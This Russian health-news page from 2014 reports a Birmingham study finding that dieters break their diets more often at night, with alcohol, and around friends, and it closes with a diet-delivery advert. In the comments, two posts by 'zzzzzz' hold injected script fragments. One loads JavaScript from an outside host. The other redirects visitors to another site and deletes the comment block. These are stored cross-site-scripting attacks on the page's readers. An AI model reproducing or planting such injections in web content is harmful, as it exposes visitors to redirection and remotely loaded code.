Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бойтесь своих друзей, есл...  >>  Бойтесь своих друзей, если хотите похудеть
 
Обратная связь
 

Бойтесь своих друзей, если хотите похудеть

Размер шрифта
06 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Строго придерживаться диеты, отказывать себе в сладостях – дело сложное. Но как оказалось, даже если все вроде получается, поход куда-нибудь с друзьями, особенно в ночное время, увеличивает шансы нарушить диету и может явиться препятствием на пути к идеальной фигуре.

Бойтесь своих друзей, если хотите похудеть

В диете и правильном питании важны не только сила воли и развитый самоконтроль. Присутствие рядом друзей и знакомых, соблазн поесть ночью, а также алкогольные напитки – вот вещи, перед которыми так сложно устоять. Исследование Хэзер МакКи из Университета Бирмингема, Великобритания, проанализировало социальные факторы, которые заставляют людей, сидящих на диетах, «жульничать».

В исследовании в течение недели участвовало 80 человек, которые были членами группы по снижению веса или же худели самостоятельно. Им раздали мобильные телефоны, с помощью которых они вели электронный дневник всех соблазнов в питании, встречавшихся им в процессе похудения. Также участники эксперимента должны были описывать ситуации, в которых они все же не могли устоять перед искушением. Это помогло исследователям составить график для каждого испытуемого в реальном времени, в котором были собраны все соблазны во время их диеты, а также совершаемые ими ошибки в питании.

Участники исследования не могли устоять перед искушением и нарушали диету более чем в 50% ситуаций, причем особенно уязвимы они были ночью. Они куда чаще позволяли себе алкогольные напитки, нежели что-нибудь сладкое. На их силу воли также оказывало влияние присутствие других людей – друзей и знакомых, независимо от того, было ли нарушение диеты случайным или же человек намеренно направлялся куда-нибудь поесть. Чем большим было искушение, тем с большей вероятностью люди позволяли себе поесть лишнего. Большинство участников эксперимента также сообщили, что они лучше соблюдали свой режим питания, пока вели дневники диеты. Данный факт очень важен и может быть использован для программ по снижению веса. Исследователи подчеркивают, что в скором будущем использование таких приложений для мобильных телефонов может помочь облегчить жизнь людям, сбрасывающим вес. Также важно поддерживать веру людей в собственные силы и способность достичь поставленных целей.

«Полученные нами данные помогают собрать кусочки мозаики в единое целое, понять, какие именно факторы оказывают влияние на нарушение режима питания, ослабляют самоконтроль и способность противостоять искушению», – говорит МакКи. «В борьбе против лишнего веса мы должны помогать людям избегать всевозможных личных, ситуационных факторов, факторов окружающей обстановки, которые ведут к ошибкам в диете. Мы должны помочь людям развить навыки, которые помогут им эффективно справляться с соблазнами и предупредить нарушения программы питания».

Таким образом, присутствие рядом друзей может повысить ваши шансы нарушить диету, однако это совсем не повод отказываться от общения с ними. Может быть, стоит приобщить и их к правильному режиму питания и соблюдать диету вместе?
Худейте вместе с друзьями с Диетой Еленой Малышевой! Уже готовая правильная еда будет доставлена вам в любое удобное место и время. Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - orsy

07 августа 2014 в 16:52

Комментарий удален за нарушение Правил общения

2 - Гость

04 сентября 2014 в 02:19

Цитировать   |   Пожаловаться

А еще бывает, знакомые когда узнают, что ты на диете, специально начинают соблазнять вкусностями - проверяют на прочность.

3 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Вы оглохнете от лишних килограммов! Как похудеть и не оглохнуть?   Диета по группе крови – полный обман! Как реально похудеть?   Даже свет во сне приводит к лишним килограммам! Как похудеть?!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.